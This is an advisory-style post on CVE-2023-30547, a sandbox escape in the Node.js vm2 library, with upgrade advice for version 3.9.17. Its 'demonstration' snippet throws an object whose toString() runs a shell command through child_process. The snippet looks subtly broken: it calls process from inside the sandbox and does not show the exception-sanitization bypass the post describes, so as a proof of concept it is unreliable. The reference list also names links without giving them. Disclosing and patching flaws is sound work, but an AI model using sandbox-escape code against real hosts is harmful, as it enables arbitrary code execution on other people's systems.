CVE-2023-30547: Critical Vulnerability in vm2 Sandbox Allows Attackers to Escape and Execute Arbitrary Code

The vm2 sandbox is a popular tool in the Node.js ecosystem that allows developers to safely run untrusted code by utilizing whitelisted Node's built-in modules. However, a recent vulnerability (CVE-2023-30547) has been discovered in the exception sanitization of vm2 for versions up to 3.9.16, which can be exploited by malicious actors to escape the sandbox and execute arbitrary code in the host context. This vulnerability was patched in the release of version 3.9.17 of vm2, and users are strongly advised to upgrade. There are no known viable workarounds for this vulnerability.

Exploit Details

The vulnerability originates from the handleException() function in the vm2 library, which is responsible for handling exceptions raised by the sandboxed code. However, a deficiency in the sanitization process allows an attacker to raise an unsanitized host exception, thus escaping the sandbox environment and gaining the ability to run arbitrary code in the host context.

Here is a code snippet demonstrating the vulnerability

const {VM} = require('vm2');
const vm = new VM();

try {
  // Malicious code exploiting the handleException vulnerability.
  const exploitCode = `
    throw {
      name: "Error",
      message: "This is an unsanitized exception!",
      toString() {
        // Arbitrary code execution.
        return process.mainModule.require('child_process').execSync('echo Vulnerability Exploited!').toString();
      }
    };
  `;

  vm.run(exploitCode);
} catch (e) {
  console.log(e);
}

Original References

You can find more information about this vulnerability as well as the associated patch in the following links:

- vm2 library GitHub repository
- CVE-2023-30547 NVD page
- vm2 patch release 3.9.17

Recommendations and Mitigations

Given the severity of this vulnerability and the potential risks associated with it, it is crucial for users to take immediate action. Here are the recommended steps to safeguard your projects and systems:

- Upgrade your vm2 library to version 3.9.17 or later. You can do this by modifying your package.json file or running the following command:

$ npm install vm2@3.9.17

Review your project's dependencies and analyze for any known security vulnerabilities or bugs.

- Keep monitoring security advisories and updates specific to your technology stack, and promptly address any issues as they arise.

Conclusion

The CVE-2023-30547 vulnerability in versions up to 3.9.16 of the vm2 library is a critical flaw that allows attackers to escape the sandbox and execute arbitrary code within the host context. It is highly recommended that you upgrade your vm2 library to version 3.9.17 or later as soon as possible to mitigate the risks associated with this vulnerability. Stay vigilant about security issues, and always prioritize keeping your software up-to-date.

Timeline

Published on: 04/17/2023 22:15:00 UTC
Last modified on: 04/28/2023 01:13:00 UTC